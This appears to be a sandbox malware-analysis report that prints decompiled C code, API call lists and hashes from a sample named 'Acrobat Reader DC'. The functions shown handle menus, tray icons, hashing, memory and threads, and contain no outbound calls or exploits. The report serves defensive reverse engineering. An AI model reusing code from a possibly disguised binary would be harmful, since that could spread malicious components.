                                  0x00448543
                                  0x00448546
                                  0x00000000
                                  0x00448546
                                  0x00448541
                                  0x00448525
                                  0x004484f9
                                  0x004484ae
                                  0x004484b5
                                  0x004485c2
                                  0x004485c8
                                  0x004484bb
                                  0x004484c1
                                  0x00448557
                                  0x0044855b
                                  0x00448562
                                  0x00448569
                                  0x0044856b
                                  0x0044856b
                                  0x00448572
                                  0x00448579
                                  0x00448580
                                  0x0044857b
                                  0x0044857b
                                  0x0044857b
                                  0x00448587
                                  0x00448598
                                  0x004485a3
                                  0x00000000
                                  0x004485a5
                                  0x004485a5
                                  0x004485af
                                  0x004485bd
                                  0x004485bd
                                  0x004485a3
                                  0x004484b5

                                  APIs
                                  • _memset.LIBCMT ref: 004484A1
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                  • IsMenu.USER32 ref: 0044854D
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                  • DrawMenuBar.USER32 ref: 004485AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                  • String ID: 0
                                  • API String ID: 3866635326-4108050209
                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E00401B80(void* __eax, void* __fp0) {
				struct _NOTIFYICONDATAW _v940;
				short _v942;
				short _v1196;
				char _v1212;
				char _v1220;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t32;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t64;
				intOrPtr _t65;
				void* _t78;

				_t78 = __fp0;
				_t23 = __eax;
				_t72 =  *0x4974ea;
				_push(_t57);
				if( *0x4974ea != 0) {
					_t64 = __eax;
					_t49 =  &_v1212;
					E004013C0(0x104,  &_v1212, _t72);
					if( *0x4974ec == 1) {
						_t49 =  *0x497520;
						LoadStringW( *0x497520, 0x65,  &_v1196, 0x7f);
					} else {
						_v1196 = 0;
					}
					E00402160( &_v1212,  &_v1196, 0, _t57);
					if( *0x4974e9 != 0) {
						_t59 =  *0x4a7f50; // 0x8dface
						E0040D200( &_v1212, _t49, _t59, _t78);
						_t65 =  *0x4a826c; // 0x9
						_t32 = E004348DE(_t65);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L7;
						} else {
							E0040D200( &_v1212, _t49, L"\nLine: ", _t78);
							_t61 = E004348DE(_t65);
							goto L6;
						}
						L13:
					} else {
						if( *((intOrPtr*)(_t64 + 0x60)) != 0) {
							E0040E0A0( &_v1212, _t64 + 0x5c);
						} else {
							_t61 =  *0x4a7f50; // 0x8dface
							L6:
							E0040D200( &_v1212, _t49, _t61, _t78);
						}
					}
					L7:
					E00412F40( &(_v940.hWnd), 0, 0x3a4);
					_v940.cbSize = 0x3a8;
					_v940.hWnd =  *0x497518;
					_v940.uID = 1;
					_v940.uFlags = 4;
					E00412FBA( &_v1196, _v1212, 0x7f);
					_v942 = 0;
					E00411567( &(_v940.szTip),  &_v1196);
					Shell_NotifyIconW(1,  &_v940);
					_t23 = E00402250( &_v1220);
				}
				return _t23;
				goto L13;
			}


















                                  0x00401b80
                                  0x00401b80
                                  0x00401b8c
                                  0x00401b95
                                  0x00401b96
                                  0x00401b9c
                                  0x00401ba3
                                  0x00401ba7
                                  0x00401bb3
                                  0x0042722b
                                  0x0042723b
                                  0x00401bb9
                                  0x00401bbb
                                  0x00401bbb
                                  0x00401bc8
                                  0x00401bd4
                                  0x00427258
                                  0x00427262
                                  0x00427267
                                  0x0042726e
                                  0x00427273
                                  0x00427275
                                  0x00000000
                                  0x0042727b
                                  0x00427284
                                  0x0042728f
                                  0x00000000
                                  0x0042728f
                                  0x00000000
                                  0x00401bda
                                  0x00401bde
                                  0x0042724e
                                  0x00401be4
                                  0x00401be4
                                  0x00401bea
                                  0x00401bee
                                  0x00401bee
                                  0x00401bde
                                  0x00401bf3
                                  0x00401c02
                                  0x00401c19
                                  0x00401c24
                                  0x00401c2b
                                  0x00401c36
                                  0x00401c41
                                  0x00401c55
                                  0x00401c5d
                                  0x00401c6f
                                  0x00401c79
                                  0x00401c79
                                  0x00401c84
                                  0x00000000

                                  APIs
                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _memset.LIBCMT ref: 00401C02
                                  • _wcsncpy.LIBCMT ref: 00401C41
                                  • _wcscpy.LIBCMT ref: 00401C5D
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy_wcslen_wcsncpy
                                  • String ID: Line:
                                  • API String ID: 1756504749-1585850449
                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040F850(void* __eax, void* __ecx, void* __eflags) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t15;
				void* _t18;
				void* _t31;
				void* _t32;
				void* _t34;
				unsigned int* _t35;
				void* _t49;
				void* _t50;
				void* _t52;
				void* _t53;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_t38 = __ecx;
				_t50 = __eax;
				_t56 = __ecx;
				_t11 = E00413530(__eax);
				_t65 = _t64 + 4;
				E0040F820(_t56);
				E0040F880(_t11, _t38, _t56, _t50);
				_t52 = _t49;
				_t15 = _t56;
				_t57 = _t55;
				_t34 = _t32;
				_t66 = _t65 - 0xc;
				_push(_t34);
				_push(_t57);
				_push(_t52);
				_t53 = _t15;
				_t35 = _t53 + 0x44;
				E0040F9D0(_t35,  &_v16, 8);
				_t42 =  *_t35 >> 0x00000003 & 0x0000003f;
				if(( *_t35 >> 0x00000003 & 0x0000003f) >= 0x38) {
					_t18 = 0x78;
				} else {
					_t18 = 0x38;
				}
				E0040F880(_t18 - _t42, _t42, _t53, 0x4921a8);
				E0040F880(8, _t42, _t53,  &_v16);
				E0040F9D0(_t53 + 0x34, _t53, 0x10);
				E00412F40(_t35, 0, 8);
				E00412F40(_t53 + 0x34, 0, 0x10);
				E00412F40(_t53 + 0x4c, 0, 0x40);
				_t36 = _t53 + 0x10;
				_t67 = _t66 + 0x24;
				 *((char*)(_t53 + 0x10)) = 0;
				_t59 = 0;
				do {
					E00414DB8( *(_t59 + _t53) & 0x000000ff,  &_v8, "%02X",  *(_t59 + _t53) & 0x000000ff);
					_t31 = E00413660(_t36,  &_v8);
					_t59 = _t59 + 1;
					_t67 = _t67 + 0x14;
				} while (_t59 < 0x10);
				return _t31;
			}


























                                  0x0040f850
                                  0x0040f853
                                  0x0040f856
                                  0x0040f858
                                  0x0040f85d
                                  0x0040f862
                                  0x0040f86c
                                  0x0040f871
                                  0x0040f872
                                  0x0040f874
                                  0x0040f875
                                  0x0040f913
                                  0x0040f916
                                  0x0040f917
                                  0x0040f918
                                  0x0040f919
                                  0x0040f91b
                                  0x0040f928
                                  0x0040f932
                                  0x0040f938
                                  0x00426b3b
                                  0x0040f93e
                                  0x0040f93e
                                  0x0040f93e
                                  0x0040f94a
                                  0x0040f958
                                  0x0040f969
                                  0x0040f973
                                  0x0040f97d
                                  0x0040f98a
                                  0x0040f98f
                                  0x0040f992
                                  0x0040f995
                                  0x0040f998
                                  0x0040f9a0
                                  0x0040f9ae
                                  0x0040f9b8
                                  0x0040f9bd
                                  0x0040f9be
                                  0x0040f9c1
                                  0x0040f9cc

                                  APIs
                                  • _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F820: _memset.LIBCMT ref: 0040F828
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                  • _memset.LIBCMT ref: 0040F973
                                  • _memset.LIBCMT ref: 0040F97D
                                  • _memset.LIBCMT ref: 0040F98A
                                  • _sprintf.LIBCMT ref: 0040F9AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$_memmove$_sprintf_strlen
                                  • String ID: %02X
                                  • API String ID: 1823384282-436463671
                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0041F6F9(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t6;
				long _t7;
				intOrPtr* _t8;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t6 = HeapReAlloc( *0x496e6c, 0, _a4, _t30);
							_t27 = _t6;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t7 = _t27;
							} else {
								__eflags =  *0x496e68 - _t6;
								if(__eflags == 0) {
									_t8 = E00417F77(__eflags);
									 *_t8 = E00417F35(GetLastError());
									goto L17;
								} else {
									__eflags = E00411988(_t30);
									if(__eflags == 0) {
										_t12 = E00417F77(__eflags);
										 *_t12 = E00417F35(GetLastError());
										L12:
										_t7 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00411988(_t30);
						 *((intOrPtr*)(E00417F77(__eflags))) = 0xc;
						goto L12;
					} else {
						E00413748(_a4);
						_t7 = 0;
					}
					L14:
					return _t7;
				} else {
					return E004135BB(__edx, __edi, __esi, _a8);
				}
			}









                                  0x0041f702
                                  0x0041f70f
                                  0x0041f710
                                  0x0041f713
                                  0x0041f715
                                  0x0041f724
                                  0x0041f757
                                  0x0041f757
                                  0x0041f75a
                                  0x00000000
                                  0x00000000
                                  0x0041f727
                                  0x0041f729
                                  0x0041f72b
                                  0x0041f72b
                                  0x0041f72b
                                  0x0041f738
                                  0x0041f73e
                                  0x0041f740
                                  0x0041f742
                                  0x0041f7a2
                                  0x0041f7a2
                                  0x0041f744
                                  0x0041f744
                                  0x0041f74a
                                  0x0041f78c
                                  0x0041f7a0
                                  0x00000000
                                  0x0041f74c
                                  0x0041f753
                                  0x0041f755
                                  0x0041f774
                                  0x0041f788
                                  0x0041f76e
                                  0x0041f76e
                                  0x0041f76e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041f755
                                  0x0041f74a
                                  0x00000000
                                  0x0041f770
                                  0x0041f75d
                                  0x0041f768
                                  0x00000000
                                  0x0041f717
                                  0x0041f71a
                                  0x0041f720
                                  0x0041f720
                                  0x0041f771
                                  0x0041f773
                                  0x0041f704
                                  0x0041f70e
                                  0x0041f70e

                                  APIs
                                  • _malloc.LIBCMT ref: 0041F707
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _free.LIBCMT ref: 0041F71A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID: [B
                                  • API String ID: 1020059152-632041663
                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00436C6E(void** _a4, intOrPtr* _a8, void** _a12) {
				void* _t7;
				void* _t11;
				void* _t23;

				_t23 = E00436B19();
				_t7 = GetCurrentProcess();
				DuplicateHandle(GetCurrentProcess(),  *_a4, _t7, _t23, 0, 0, 2);
				_t2 = _t23 + 8; // 0x8
				_t11 = GetCurrentProcess();
				DuplicateHandle(GetCurrentProcess(),  *_a12, _t11, _t2, 0, 0, 2);
				 *((intOrPtr*)(_t23 + 4)) =  *_a8;
				return CreateThread(0, 0, E00436C2B, _t23, 0, 0);
			}






                                  0x00436c83
                                  0x00436c88
                                  0x00436c9a
                                  0x00436ca2
                                  0x00436ca6
                                  0x00436cb2
                                  0x00436cc7
                                  0x00436cd4

                                  APIs
                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                  • CreateThread.KERNEL32 ref: 00436CCA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                  • String ID:
                                  • API String ID: 1957940570-0
                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E0043028B(signed int _a4, int _a8, signed int _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				signed int _t161;
				int _t182;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				struct HWND__* _t223;
				long _t225;
				struct HWND__* _t226;
				signed int _t228;
				signed int _t243;
				struct HWND__* _t244;
				signed int _t251;
				struct HWND__* _t252;
				struct HWND__* _t256;
				struct HWND__** _t265;
				struct HWND__* _t266;
				struct HWND__** _t275;

				_t275 = _a8;
				_t265 = _a4;
				if(_t265[0xe] == 0) {
					_a8 = _t275[0x1f] & 0x0000ffff;
					GetClientRect( *_t265,  &_v56);
					_t161 = _v56.right;
					_t243 = _v56.bottom;
					_t223 = _t265[0x11];
					_t218 = _t265[0x12];
					_a12 = _t161;
					_v24 = _t243;
					_a4 = _t223;
					_v12 = _t218;
					if(_t161 == 0) {
						_a12 = 1;
						if(_t223 != 0) {
							_a12 = _t223;
						}
					}
					if(_t243 == 0) {
						_v24 = 1;
						if(_t218 != 0) {
							_v24 = _t218;
						}
					}
					if(_t265[0x68] != 0) {
						_t218 = _t218 - GetSystemMetrics(0xf);
						_v12 = _t218;
					}
					GetWindowRect( *_t275,  &_v56);
					_t225 = _v56.left;
					_t244 = _v56.top;
					_v16 = _v56.right - _t225;
					_v40.bottom = _t244;
					_v20 = _v56.bottom - _t244;
					_v40.right.x = _t225;
					ScreenToClient( *_t265,  &(_v40.right));
					_t226 = _v40.right.x;
					asm("cdq");
					_t266 = _v40.bottom;
					_t275[0x20] = _t226 * _a4 / _a12;
					asm("cdq");
					_t219 = _v24;
					_t275[0x20] = _t266 * _t218 / _v24;
					asm("cdq");
					_t275[0x21] = _v16 * _a4 / _a12;
					asm("cdq");
					_t275[0x21] = _v20 * _v12 / _t219;
					_t182 = _a8;
					if(_t182 == 0) {
						goto L48;
					} else {
						if((_t182 & 0x00000100) != 0) {
							_t256 = _v16;
							_t275[0x21] = _t256;
							if((_t182 & 0x00000006) == 0) {
								if((_t182 & 0x00000008) == 0) {
									asm("cdq");
									if(_t226 > _a12 - _t256 >> 1) {
										_t220 = _a12;
										asm("cdq");
										_t219 = _v24;
										_t275[0x20] = (_t226 - _a12 + _v16) * _a4 / _t220 - _v16 + _a4;
									}
								} else {
									asm("cdq");
									_t275[0x20] = _t226 - (_a4 - _a12 - _t256 >> 1);
								}
								_t182 = _a8;
							}
						}
						if((_t182 & 0x00000200) != 0) {
							_t252 = _v20;
							_t275[0x21] = _t252;
							if((_t182 & 0x00000060) == 0) {
								if(_t182 >= 0) {
									asm("cdq");
									if(_t266 > _t219 - _t252 >> 1) {
										asm("cdq");
										_t275[0x20] = (_t266 - _t219 + _v20) * _v12 / _t219 - _v20 + _v12;
									}
								} else {
									asm("cdq");
									_t275[0x20] = _t266 - (_v12 - _t219 - _t252 >> 1);
								}
								_t182 = _a8;
							}
						}
						_t251 = _t182 & 0x00000002;
						if(_t251 != 0) {
							_t275[0x20] = _t226;
						}
						if((_t182 & 0x00000004) != 0) {
							if(_t251 == 0) {
								_t275[0x20] = _t226 - _a12 - _t275[0x21] + _a4 + _v16;
							} else {
								_t275[0x21] = _t226 - _t275[0x20] - _a12 + _a4 + _v16;
							}
						}
						_t228 = _t182 & 0x00000020;
						if(_t228 != 0) {
							_t275[0x20] = _t266;
						}
						if((_t182 & 0x00000040) == 0) {
							goto L48;
						} else {
							if(_t228 == 0) {
								_t275[0x20] = _t266 - _t275[0x21] - _t219 + _v12 + _v20;
								return _t182;
							}
							_t275[0x21] = _t266 - _t275[0x20] - _t219 + _v12 + _v20;
							return _t182;
						}
					}
				} else {
					_t275[0x20] = _t265[0x16];
					_t275[0x20] = _t265[0x17];
					if(_t275[0x22] != 7 || _a12 != 0) {
						_t275[0x21] = _t265[0x18];
						_t275[0x21] = _t265[0x19];
					}
					GetClientRect( *_t275,  &_v40);
					_t221 = _t217 | 0xffffffff;
					if(_t265[0x16] == _t221) {
						_t275[0x20] = _v40.left;
					}
					if(_t265[0x17] == _t221) {
						_t275[0x20] = _v40.top;
					}
					_t182 = GetWindowRect( *_t275,  &_v40);
					if(_t265[0x18] == _t221) {
						_t275[0x21] = _v40.right.x - _v40.left;
					}
					if(_t265[0x19] == _t221 || _t275[0x22] == 0) {
						_t275[0x21] = _v40.bottom - _v40.top;
						return _t182;
					} else {
						L48:
						return _t182;
					}
				}
			}



























                                  0x00430293
                                  0x00430297
                                  0x0043029e
                                  0x00430361
                                  0x00430364
                                  0x0043036a
                                  0x0043036d
                                  0x00430370
                                  0x00430373
                                  0x00430376
                                  0x00430379
                                  0x0043037c
                                  0x0043037f
                                  0x00430384
                                  0x00430386
                                  0x0043038f
                                  0x00430391
                                  0x00430391
                                  0x0043038f
                                  0x00430396
                                  0x00430398
                                  0x004303a1
                                  0x004303a3
                                  0x004303a3
                                  0x004303a1
                                  0x004303ad
                                  0x004303b7
                                  0x004303b9
                                  0x004303b9
                                  0x004303c3
                                  0x004303c9
                                  0x004303cf
                                  0x004303d4
                                  0x004303dc
                                  0x004303e2
                                  0x004303e9
                                  0x004303ec
                                  0x004303f2
                                  0x004303fb
                                  0x004303ff
                                  0x00430402
                                  0x0043040e
                                  0x00430412
                                  0x00430415
                                  0x00430423
                                  0x00430427
                                  0x00430435
                                  0x00430438
                                  0x0043043f
                                  0x00430445
                                  0x00000000
                                  0x0043044b
                                  0x00430450
                                  0x00430452
                                  0x00430456
                                  0x0043045f
                                  0x00430463
                                  0x00430480
                                  0x00430487
                                  0x00430489
                                  0x00430497
                                  0x0043049a
                                  0x004304a3
                                  0x004304a3
                                  0x00430465
                                  0x0043046b
                                  0x00430474
                                  0x00430474
                                  0x004304aa
                                  0x004304aa
                                  0x0043045f
                                  0x004304b2
                                  0x004304b4
                                  0x004304b8
                                  0x004304c1
                                  0x004304c5
                                  0x004304e0
                                  0x004304e7
                                  0x004304f4
                                  0x004304fd
                                  0x004304fd
                                  0x004304c7
                                  0x004304cc
                                  0x004304d5
                                  0x004304d5
                                  0x00430504
                                  0x00430504
                                  0x004304c1
                                  0x00430509
                                  0x0043050c
                                  0x0043050e
                                  0x0043050e
                                  0x00430517
                                  0x0043051c
                                  0x0043054c
                                  0x0043051e
                                  0x00430531
                                  0x00430531
                                  0x0043051c
                                  0x00430555
                                  0x00430558
                                  0x0043055a
                                  0x0043055a
                                  0x00430563
                                  0x00000000
                                  0x00430565
                                  0x00430568
                                  0x0043059e
                                  0x00000000
                                  0x0043059e
                                  0x0043057c
                                  0x00430589
                                  0x00430589
                                  0x00430563
                                  0x004302a4
                                  0x004302af
                                  0x004302ba
                                  0x004302c1
                                  0x004302cd
                                  0x004302d8
                                  0x004302d8
                                  0x004302e6
                                  0x004302ec
                                  0x004302f2
                                  0x004302f8
                                  0x004302f8
                                  0x00430302
                                  0x00430308
                                  0x00430308
                                  0x00430316
                                  0x0043031f
                                  0x00430327
                                  0x00430327
                                  0x00430331
                                  0x00430346
                                  0x00430353
                                  0x004305ab
                                  0x004305ab
                                  0x004305ab
                                  0x004305ab
                                  0x00430331

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                  • String ID:
                                  • API String ID: 3220332590-0
                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
